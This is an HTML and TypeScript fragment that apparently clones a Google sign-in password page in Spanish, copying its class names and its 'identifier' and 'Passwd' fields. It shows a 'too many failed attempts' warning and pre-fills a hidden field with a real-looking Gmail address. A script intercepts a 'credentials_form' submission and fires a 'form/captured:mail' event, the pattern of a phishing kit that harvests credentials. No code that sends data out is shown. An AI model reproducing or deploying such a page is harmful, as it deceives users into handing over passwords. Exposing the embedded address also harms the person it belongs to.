<form method="post">
  <section
    class="Em2Ord PsAlOe rNe0id eLNT1d S7S4N"
    data-callout-type="2"
    aria-hidden="true"
    aria-live="assertive"
    aria-atomic="true"
  >
    <header class="vYeFie">
      <div class="ozEFYb" role="presentation">
        <h2 class="x9zgF TrZEUc">
          <span class="CuWxc" aria-hidden="true"
            ><svg
              aria-hidden="true"
              class="Qk3oof C3qbwe"
              fill="currentColor"
              focusable="false"
              width="20px"
              height="20px"
              viewBox="0 0 24 24"
              xmlns="https://www.w3.org/2000/svg"
              ><path d="M1 21h22L12 2 1 21zm12-3h-2v-2h2v2zm0-4h-2v-4h2v4z"
              ></path></svg
            ></span
          ><span>Se han producido demasiados intentos fallidos</span>
        </h2><div class="osxBFb" aria-hidden="true"></div>
      </div>
    </header>
    <div class="yTaH4c"><div></div></div>
  </section>
  
  <section class="Em2Ord">
    <header class="vYeFie" aria-hidden="true"></header><div class="yTaH4c">
      <div>
        <c-wiz
          jsrenderer="PXsWy"
          jsdata="deferred-c27"
          data-p='%.@.null,"identity-signin-password"]'
          jscontroller="oqkvIf"
          jsname="xdJtEf"
          data-node-index="1;0"
          jsmodel="hc6Ubd"
          c-wiz=""><c-data id="c27" jsdata=" U3wROe;_;$30"></c-data></c-wiz
        >
        <input
          type="email"
          name="identifier"
          class="Hvu6D"
          tabindex="-1"
          aria-hidden="true"
          spellcheck="false"
          value="maizogabriel39@gmail.com"
          autocomplete="off"
          id="hiddenEmail"
        />
        <div class="njnYzb NhPs4c" data-is-visible="false">
          <div class="YqLCIe">
            <div class="El1b7b">
              <div class="klRug">
                <div class="H2p7Gf">
                  <div id="password" class="rFrNMe i79UJc zKHdkd sdJrJc">
                    <div class="aCsJod oJeWuf">
                      <div class="aXBtI Wic03c">
                        <div class="Xb9hP">
                          <input
                            type="password"
                            class="whsOnd zHQkBf"
                            autocomplete="current-password"
                            spellcheck="false"
                            tabindex="0"
                            aria-label="Introduce tu contraseña"
                            name="Passwd"
                            aria-disabled="false"
                            autocapitalize="off"
                            data-initial-value=""
                          />
                          <div class="AxOyFc snByac" aria-hidden="true">
                            Introduce tu contraseña
                          </div>
                        </div><div class="i9lrp mIZh1c"></div>
                        <div
                          class="OabDMe cXrdqd Y2Zypf"
                          style="transform-origin: 199px center;"
                        >
                        </div>
                      </div>
                    </div><div class="LXRPh">
                      <div class="ovnfwe Is7Fhb"></div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div><div class="Ly8vae uSvLId" aria-live="polite"></div><div
            class="v8aRxf"
          >
            <div class="myYH1 g9Mx QkTfte">
              <div class="Hy62Fc">
                <div class="sfqPrd rBUW7e">
                  <div class="QTJzre NEk0Ve">
                    <div class="uxXgMe">
                      <div
                        class="VfPpkd-dgl2Hf-ppHlrf-sM5MNb"
                        data-is-touch-wrapper="true"
                      >
                        <div
                          class="VfPpkd-MPu53c VfPpkd-MPu53c-OWXEXe-dgl2Hf Ne8lhe swXlm az2ine lezCeb kAVONc VfPpkd-MPu53c-OWXEXe-mWPk3d"
                          data-indeterminate="false"
                          data-disable-idom="true"
                          data-value="optionc29"
                        >
                          <input
                            class="VfPpkd-muHVFf-bMcfAe"
                            type="checkbox"
                            aria-labelledby="selectionc28"
                          /><div class="VfPpkd-YQoJzd">
                            <svg
                              aria-hidden="true"
                              class="VfPpkd-HUofsb"
                              viewBox="0 0 24 24"
                              ><path
                                class="VfPpkd-HUofsb-Jt5cK"
                                fill="none"
                                d="M1.73,12.91 8.1,19.28 22.79,4.59"
                              ></path></svg
                            ><div class="VfPpkd-SJnn3d"></div>
                          </div><div class="VfPpkd-OYHm6b"></div><div
                            class="VfPpkd-sMek6-LhBDec"
                          >
                          </div>
                        </div>
                      </div>
                    </div><div class="gyrWGe">
                      <div class="jOkGjb">
                        <div id="selectionc28" class="dJVBl wIAG6d">
                          Mostrar contraseña
                        </div>
                      </div><div class="RAvnDd">
                        <div class="dJVBl wIAG6d"></div>
                      </div>
                    </div>
                  </div>
                </div>
              </div><div aria-atomic="true" aria-live="polite" class="O6yUcb">
                <div></div>
              </div>
            </div>
          </div><div class="NdBX9e"></div>
        </div><input type="hidden" name="TrustDevice" value="true" /><input
          type="hidden"
          name="historicalPassword"
          value="false"
        />
      </div>
    </div>
  </section>
</form>

<!-- 
<form id="credentials_form" method="post">
  <section class="Em2Ord">
    <header class="vYeFie" aria-hidden="true"></header>

    <div class="yTaH4c">
      <div class="AFTWye vEQsqe">
        <div class="rFrNMe X3mtXb UOsO2 ToAxb zKHdkd sdJrJc Tyc9J" onfocus="this.classList.add('u3bW4e');" onblur="this.classList.remove('u3bW4e');">
          <div class="aCsJod oJeWuf">
            <div class="aXBtI Wic03c">
              <div class="Xb9hP">
                <input
                  type="email"
                  id="email"
                  name="email"
                  class="whsOnd zHQkBf"
                  autocomplete="username webauthn"
                  spellcheck="false"
                  tabindex="0"
                  aria-label="Correo electrónico o teléfono"
                  aria-disabled="false"
                  autocapitalize="none"
                />
                <div class="AxOyFc snByac" aria-hidden="true">
                  Correo electrónico o teléfono
                </div>
              </div>
              <div class="i9lrp mIZh1c"></div>
              <div class="OabDMe cXrdqd Y2Zypf"></div>
            </div>
          </div>
        </div>
      </div>

      <div class="dMNVAe">
        <button type="submit" aria-label="Recuperar correo">
          ¿Has olvidado tu correo electrónico?
        </button>
      </div>
    </div>
  </section>
</form> 
-->

<script>
  const credForm = document.getElementById("credentials_form");

  const handleSubmit = (ev: SubmitEvent) => {
    ev.preventDefault();
    const custom = new CustomEvent("form/captured:mail", { detail: true });
    document.dispatchEvent(custom);
  };

  credForm?.addEventListener("submit", handleSubmit);
</script>
